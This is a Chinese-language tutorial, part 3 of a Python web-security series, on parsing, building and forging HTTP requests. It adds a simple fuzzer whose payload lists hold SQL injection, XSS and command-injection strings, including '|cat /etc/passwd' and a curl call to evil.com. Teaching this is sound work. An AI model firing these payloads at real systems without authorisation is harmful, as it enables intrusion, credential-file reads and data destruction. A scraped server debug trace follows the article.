当前位置:首页>python>Python网络安全实战(3/10):HTTP请求分析与伪造

Python网络安全实战(3/10):HTTP请求分析与伪造

  • 2026-06-30 09:46:31
Python网络安全实战(3/10):HTTP请求分析与伪造

## 引言

HTTP是Web安全中最核心的协议之一。理解HTTP请求的细节结构、掌握请求伪造技术,是进行安全测试的基础。无论是SQL注入、XSS攻击还是逻辑漏洞,都依赖于对HTTP请求的精准控制。

## 第一部分:HTTP协议深度解析

```python

import http.server

import urllib.parse

classHTTPProtocolAnalyzer:

"""HTTP协议分析器 - 学习如何拆解和分析HTTP请求"""

@staticmethod

defparse_request(request_linestr) -> dict:

"""

        解析HTTP请求行

        请求行格式: METHOD /path HTTP/1.1

        例如: GET /login.php?id=1 HTTP/1.1

        """

        parts = request_line.split()

iflen(parts) != 3:

raiseValueError(f"Invalid request line: {request_line}")

        method, path, protocol = parts

# 分离路径和查询字符串

        parsed = urllib.parse.urlparse(path)

        query_params = urllib.parse.parse_qs(parsed.query)

return {

"method": method,

"path": parsed.path,

"protocol": protocol,

"query_string": parsed.query,

"query_params": query_params,

"full_path": path

        }

@staticmethod

defparse_headers(headers_textstr) -> dict:

"""解析HTTP请求头"""

        headers = {}

for line in headers_text.strip().split("\n"):

if": "in line:

                key, value = line.split(": "1)

                headers[key] = value

return headers

@staticmethod

defanalyze_method_risks(methodstr) -> str:

"""分析HTTP方法的安全风险"""

        risk_analysis = {

"GET": {

"level""低风险",

"issues": ["参数在URL中可见""可能被浏览器历史记录保留"],

"attack_vectors": ["SQL注入""XSS""参数污染"]

            },

"POST": {

"level""中风险",

"issues": ["Body数据较大""CSRF攻击"],

"attack_vectors": ["SQL注入""命令注入""文件上传"]

            },

"PUT": {

"level""高风险",

"issues": ["允许文件写入""覆盖现有文件"],

"attack_vectors": ["文件覆盖""WebShell上传"]

            },

"DELETE": {

"level""高风险",

"issues": ["删除资源""无法恢复"],

"attack_vectors": ["删除数据""破坏业务"]

            },

"OPTIONS": {

"level""信息泄漏",

"issues": ["泄露支持的HTTP方法"],

"attack_vectors": ["方法枚举"]

            },

"TRACE": {

"level""高风险",

"issues": ["Cross-Site Tracing攻击"],

"attack_vectors": ["Cookie窃取"]

            }

        }

return risk_analysis.get(method, "未知风险")

@staticmethod

defprint_protocol_details(http_requeststr):

"""

        详细展示HTTP请求的每一个组成部分

        这是理解协议的好方法。通过手动解析,

        你可以直观地看到每个字段的含义。

        """

print("=" * 60)

print("HTTP 请求深度解析")

print("=" * 60)

# 分割请求行和头部

        parts = http_request.split("\n\n"1)

        request_part = parts[0]

        body = parts[1iflen(parts) > 1else""

        lines = request_part.split("\n")

        request_line = lines[0]

print(f"\n【请求行】")

print(f"  原始: {request_line}")

        parsed = HTTPProtocolAnalyzer.parse_request(request_line)

print(f"  方法: {parsed['method']}")

print(f"  路径: {parsed['path']}")

print(f"  查询: {parsed['query_params']}")

print(f"  协议: {parsed['protocol']}")

print(f"\n【请求头】")

for line in lines[1:]:

if": "in line:

                key, value = line.split(": "1)

                risk = ""

# 检测潜在的敏感头

if key.lower() in ("authorization""cookie""x-auth-token"):

                    risk = " ⚠️ 敏感信息!"

elif key.lower() in ("referer""origin"):

                    risk = " 🔍 可用于越权检测"

print(f"  {key}{value}{risk}")

print(f"\n【请求体】")

if body:

print(f"  {body[:200]}{'...'iflen(body) > 200else''}")

# 如果是表单格式,解析参数

if"&"in body and"="in body:

                params = urllib.parse.parse_qs(body)

print(f"  表单参数: {params}")

else:

print("  (空)")

# ===== 使用示例 =====

if__name__ == "__main__":

    analyzer = HTTPProtocolAnalyzer()

    sample_request = """POST /login.php HTTP/1.1

Host: target.example.com

User-Agent: Mozilla/5.0

Accept: text/html,application/xhtml+xml

Accept-Language: zh-CN,zh;q=0.9

Content-Type: application/x-www-form-urlencoded

Content-Length: 52

Connection: keep-alive

Cookie: session_id=abc123; admin=true

X-Forwarded-For: 192.168.1.100

username=admin&password=admin123&remember=1"""

    analyzer.print_protocol_details(sample_request)

```

## 第二部分:构造自定义HTTP请求

```python

import urllib.request

import urllib.error

import json

from typing import Dict, Optional, List

classHTTPRequestBuilder:

"""

    HTTP请求构建器 - 用于构造各种HTTP请求进行测试

    用途:

    - 绕过简单WAF(修改Header、User-Agent等)

    - 模拟不同客户端行为

    - 测试API接口的边界条件

    """

def__init__(selfbase_urlstrheaders: Optional[Dict] = None):

self.base_url = base_url

self.default_headers = headers or {}

defbuild_get(selfpathstrparams: Optional[Dict] = None,

headers: Optional[Dict] = None) -> urllib.request.Request:

"""构建GET请求"""

        url = self.base_url + path

if params:

            query_string = urllib.parse.urlencode(params)

            url += "?" + query_string

        req_headers = {**self.default_headers, **(headers or {})}

        req = urllib.request.Request(url, headers=req_headers, method="GET")

return req

defbuild_post_form(selfpathstrdata: Dict,

headers: Optional[Dict] = None) -> urllib.request.Request:

"""构建application/x-www-form-urlencoded POST请求"""

        encoded_data = urllib.parse.urlencode(data).encode("utf-8")

        default_headers = {

"Content-Type""application/x-www-form-urlencoded",

"Content-Length"str(len(encoded_data))

        }

        req_headers = {**default_headers, **(headers or {})}

        req = urllib.request.Request(

self.base_url + path,

data=encoded_data,

headers=req_headers,

method="POST"

        )

return req

defbuild_post_json(selfpathstrdata: Dict,

headers: Optional[Dict] = None) -> urllib.request.Request:

"""构建application/json POST请求"""

        json_data = json.dumps(data).encode("utf-8")

        default_headers = {

"Content-Type""application/json",

"Content-Length"str(len(json_data))

        }

        req_headers = {**default_headers, **(headers or {})}

        req = urllib.request.Request(

self.base_url + path,

data=json_data,

headers=req_headers,

method="POST"

        )

return req

defbuild_upload(selfpathstrfiles: Dict,

headers: Optional[Dict] = None) -> urllib.request.Request:

"""

        构建multipart/form-data文件上传请求

        (简化版,实际生产建议使用requests库)

        """

        boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW"

        data_lines = []

for field_name, file_content in files.items():

            data_lines.append(f"--{boundary}")

            data_lines.append(f'Content-Disposition: form-data; name="{field_name}"; filename="{field_name}"')

            data_lines.append("Content-Type: application/octet-stream")

            data_lines.append("")

            data_lines.append(str(file_content))

        data_lines.append(f"--{boundary}--")

        data_lines.append("")

        body = "\r\n".join(data_lines).encode("utf-8")

        default_headers = {

"Content-Type"f"multipart/form-data; boundary={boundary}"

        }

        req_headers = {**default_headers, **(headers or {})}

        req = urllib.request.Request(

self.base_url + path,

data=body,

headers=req_headers,

method="POST"

        )

return req

defsend_and_analyze(selfrequest: urllib.request.Request,

timeoutint = 10) -> dict:

"""发送请求并分析响应"""

        result = {

"status_code"None,

"headers": {},

"body""",

"response_time"0,

"error"None

        }

import time

        start_time = time.time()

try:

with urllib.request.urlopen(request, timeout=timeout) as response:

                result["status_code"] = response.status

                result["headers"] = dict(response.headers)

                result["body"] = response.read().decode("utf-8"errors="ignore")

                result["response_time"] = time.time() - start_time

except urllib.error.HTTPError as e:

            result["status_code"] = e.code

            result["headers"] = dict(e.headers)

try:

                result["body"] = e.read().decode("utf-8"errors="ignore")

except:

                result["body"] = "[无法读取响应体]"

            result["response_time"] = time.time() - start_time

except urllib.error.URLError as e:

            result["error"] = str(e.reason)

            result["response_time"] = time.time() - start_time

exceptExceptionas e:

            result["error"] = str(e)

            result["response_time"] = time.time() - start_time

return result

# ===== 演示:请求头伪装 =====

classHeaderCloaking:

"""

    请求头伪装技术演示

    这些技术在测试中常见,了解它们有助于防御

    """

# 不同的浏览器指纹

FAKE_HEADERS = {

"chrome_win": {

"User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) "

"AppleWebKit/537.36 (KHTML, like Gecko) "

"Chrome/120.0.0.0 Safari/537.36",

        },

"firefox_linux": {

"User-Agent""Mozilla/5.0 (X11; Linux x86_64; rv:121.0) "

"Gecko/20100101 Firefox/121.0",

        },

"safari_mac": {

"User-Agent""Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "

"AppleWebKit/605.1.15 (KHTML, like Gecko) "

"Version/17.0 Safari/605.1.15",

        },

"python_requests": {

"User-Agent""python-requests/2.31.0",

"Accept-Encoding""gzip, deflate",

"Connection""keep-alive",

        },

"curl": {

"User-Agent""curl/8.1.2",

        },

    }

@classmethod

defdemonstrate(cls):

"""演示各种User-Agent的区别"""

print("=" * 60)

print("User-Agent 指纹对比")

print("=" * 60)

for name, headers incls.FAKE_HEADERS.items():

print(f"\n  [{name}]")

for key, value in headers.items():

print(f"    {key}{value[:80]}{'...'iflen(value) > 80else''}")

```

## 第三部分:HTTP请求伪造测试

```python

classHTTPFuzzTester:

"""

    HTTP请求模糊测试器

    用于测试边界情况和异常输入

    """

# SQL注入测试payload

SQLI_PAYLOADS = [

"' OR '1'='1",

"' OR 1=1 --",

"1'; DROP TABLE users; --",

"' UNION SELECT username, password FROM users --",

"admin'--",

"1 AND EXTRACTVALUE(1, CONCAT(0x7e, VERSION()))",

    ]

# XSS测试payload

XSS_PAYLOADS = [

"<script>alert('XSS')</script>",

"<img src=x onerror=alert(1)>",

"<svg/onload=alert('XSS')>",

"javascript:alert(document.cookie)",

'<iframe src="javascript:alert(1)">',

    ]

# 命令注入测试payload

CMDI_PAYLOADS = [

";ls -la",

"|cat /etc/passwd",

"`whoami`",

"$(id)",

"127.0.0.1; curl http://evil.com",

    ]

deftest_sql_injection(selfurlstrparam_namestr = "id") -> List[dict]:

"""

        检测SQL注入点(基础版)

        通过分析响应变化来判断是否存在注入

        """

        results = []

print(f"[*] 测试SQL注入: {url}?{param_name}=x")

# 获取基准响应(正常请求)

        builder = HTTPRequestBuilder(url)

        baseline_req = builder.build_get("", {param_name: "1"})

        baseline_resp = builder.send_and_analyze(baseline_req)

# 逐个测试payload

for payload inself.SQLI_PAYLOADS:

            req = builder.build_get("", {param_name: payload})

            resp = builder.send_and_analyze(req)

# 比较响应差异

ifself._detect_anomaly(baseline_resp, resp):

                results.append({

"payload": payload,

"original_length"len(baseline_resp["body"]),

"modified_length"len(resp["body"]),

"difference"abs(len(resp["body"]) - len(baseline_resp["body"]))

                })

return results

deftest_xss(selfurlstrparam_namestr = "q") -> List[dict]:

"""检测反射型XSS(基础版)"""

        results = []

        builder = HTTPRequestBuilder(url)

for payload inself.XSS_PAYLOADS:

            req = builder.build_get("", {param_name: payload})

            resp = builder.send_and_analyze(req)

if payload in resp["body"]:

                results.append({

"payload": payload,

"reflected"True,

"response_length"len(resp["body"])

                })

return results

def_detect_anomaly(selfbaselinedicttest_responsedict) -> bool:

"""

        检测响应是否发生明显变化

        简单启发式:比较响应长度和内容

        实际的漏洞检测需要更复杂的分析

        """

        length_diff = abs(

len(test_response["body"]) - len(baseline["body"])

        )

        status_change = test_response["status_code"] != baseline["status_code"]

# 如果长度变化很大或状态码改变,可能存在注入

return length_diff > 50or status_change

```

## 第四部分:构建本地HTTP服务器进行调试

```python

classDebugHTTPServer(http.server.BaseHTTPRequestHandler):

"""

    调试用HTTP服务器 - 用于观察和分析接收到的请求

    这个服务器会记录所有收到的请求细节,

    帮助你理解攻击者发送给服务器的具体内容。

    """

defdo_GET(self):

self._log_request("GET")

defdo_POST(self):

self._log_request("POST")

def_log_request(selfmethodstr):

"""记录请求详情"""

print(f"\n{'=' * 60}")

print(f"[请求] {method}{self.path}")

print(f"[来源] {self.client_address[0]}:{self.client_address[1]}")

print(f"[协议] {self.request_version}")

for header, value inself.headers.items():

print(f"[头]   {header}{value}")

if method == "POST":

            content_length = int(self.headers.get("Content-Length"0))

            body = self.rfile.read(content_length)

print(f"[体]   {body.decode('utf-8'errors='ignore')[:200]}")

# 回复

self.send_response(200)

self.send_header("Content-Type""text/plain")

self.end_headers()

self.wfile.write(b"Debug OK")

print(f"{'=' * 60}")

defstart_debug_server(portint = 8888):

"""启动调试HTTP服务器"""

    server = http.server.HTTPServer(("0.0.0.0", port), DebugHTTPServer)

print(f"[*] 调试服务器已启动: http://0.0.0.0:{port}")

print("[*] 向此地址发送任何HTTP请求将被记录和分析")

try:

        server.serve_forever()

exceptKeyboardInterrupt:

print("\n[*] 服务器已停止")

        server.server_close()

```

## 实战练习

### 练习1:自定义HTTP代理

编写一个简单的HTTP代理服务器,拦截、查看和修改所有经过的请求:

- 记录所有POST请求的body数据

- 自动标记可疑的User-Agent

- 统计每种HTTP方法的分布

### 练习2:CORS安全测试

测试CORS配置是否正确:

- 发送带有Origin头的跨域请求

- 检查Access-Control-Allow-Origin是否返回具体域名而非`*`

- 测试是否允许携带凭证

### 练习3:HTTP方法枚举

编写脚本自动发现服务器上允许的HTTP方法:

- 使用OPTIONS探测每个资源的可用方法

- 标记PUT/DELETE等非标准方法

- 评估安全风险

## 总结

本篇教程涵盖了:

- ✅ HTTP协议深度解析

- ✅ 自定义HTTP请求构建

- ✅ Header伪装技术

- ✅ HTTP模糊测试框架

- ✅ 调试服务器搭建

掌握HTTP请求分析后,下一节我们将学习:**密码哈希破解**——理解MD5/SHA加密原理,实现密码哈希检测和基础破解。

---

> ⚖️ **版权声明**:本教程仅供学习和研究用途。请勿用于非法用途。

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 00:54:45 HTTP/2.0 GET : https://f.mffb.com.cn/a/501004.html
  2. 运行时间 : 0.482448s [ 吞吐率:2.07req/s ] 内存消耗:4,901.84kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=e43f029a5264e875051997e8e34354d0
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
